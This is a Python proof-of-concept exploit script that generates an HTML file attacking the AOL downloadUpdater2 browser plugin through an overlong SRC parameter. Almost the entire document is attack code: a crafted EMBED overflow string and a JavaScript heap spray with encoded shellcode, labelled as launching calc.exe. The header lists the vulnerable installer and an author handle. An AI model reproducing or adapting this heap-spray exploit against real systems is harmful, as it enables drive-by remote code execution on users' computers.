'''
Title : AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution (Heap Spray)
Version : 1.3.0.0
File : npdnupdater2.dll
Tested : Windows XP SP3 with Mozilla Firefox 3.6.19
Author : Senator of Pirates
Contact : Snator.of.Pirates.team [at] gmail.com
FaceBook : SenatorofPirates
Greet to : Morocco & U.S.A

PoC : 1337day.com/exploits/19117

download url: http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe
(this was the update for a previous vulnerability, see ZDI-12-098)

see also the installer aol_toolbar_pricecheck.exe
url: http://toolbar.aol.com/download_files/download-helper.html?brand=aol&a=111&ncid=txtlnkusdown00000043
'''

PoC = "<EMBED TYPE=applicatiotn/x-vend.aol.dnupdater2.1"
PoC += "\n"
PoC += "SRC="
PoC += "\x41" *4484
PoC += "\x0c\x0c\x0c\x0c"
PoC += "\n"
PoC += "\x61" *16
PoC += "\n"
PoC += ">"
PoC += "\n"
PoC += "</EMBED>"
PoC += "\n\n"
temp = """<script>
// Calc.exe
shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');

nops = unescape ('%u\9090%u\9090');
headersize = 20;


slackspace = headersize + shellcode. length ;
while (nops. length < slackspace) nops += nops;
fillblock= nops.substring(0, slackspace);

block= nops.substring(0, nops. length - slackspace);
while (block. length +slackspace < 0x50000) block= block+ block+ fillblock;

memory= new Array ();
for ( counter=0; counter<250; counter++) memory[counter]= block + shellcode;
</script>"""

Total = PoC+temp
File = "Boom.html"
crashy = open(File,"w")
crashy.write(Total)
crashy.close()